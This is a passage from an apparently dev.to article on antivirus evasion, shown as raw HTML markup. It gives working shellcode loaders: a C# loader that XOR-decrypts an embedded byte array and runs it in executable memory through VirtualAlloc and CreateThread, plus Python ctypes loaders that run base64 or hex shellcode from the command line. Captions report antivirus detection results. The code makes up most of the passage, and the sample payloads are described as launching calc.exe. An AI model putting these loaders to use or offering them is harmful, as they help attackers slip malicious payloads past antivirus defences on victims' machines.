class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x08&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x37&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x55&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xeb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x17&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xea&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x70&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xaa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xad&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xdc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x81&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xdc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xcc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa4&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"qing"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"xor"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;


            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;//--------------------------------------------------------------&lt;/span&gt;
            &lt;span class="c1"&gt;// Decrypt the shellcode&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s"&gt;"xor"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;xor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedShellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Encoding&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ASCII&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s"&gt;"aes"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;aesDecrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedShellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Convert&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="c1"&gt;//--------------------------------------------------------------            &lt;/span&gt;
            &lt;span class="c1"&gt;// Copy decrypted shellcode to memory&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;// Prepare data&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;// Invoke the shellcode&lt;/span&gt;
            &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0xFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject&lt;/span&gt;
        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flAllocationType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flProtect&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadAttributes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwStackSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;param&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwCreationFlags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadId&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hHandle&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwMilliseconds&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo42st6e2g58ddmqpzx4x.png" alt="Figure 13: XOR-encrypted shellcode C# loader implementation" width="800" height="522"&gt;Figure 13: XOR-encrypted shellcode C# loader implementation
  



  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0l61b53i8872cbw236l4.png" alt="Figure 14: AV detection results for XOR-encrypted shellcode" width="799" height="494"&gt;Figure 14: AV detection results for XOR-encrypted shellcode
  


&lt;p&gt;The same principles apply to other programming languages. For instance, &lt;strong&gt;Python&lt;/strong&gt; supports XOR encoding, Base64, and hexadecimal encoding, among others.&lt;/p&gt;
&lt;h4&gt;
  
  
  Python Base64 Example (k8gege):
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;
&lt;span class="c1"&gt;#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hex&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x3000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nf"&gt;from_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RtlMoveMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                     &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ht&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ht&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Python Hexadecimal Example:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="c1"&gt;#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hex&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
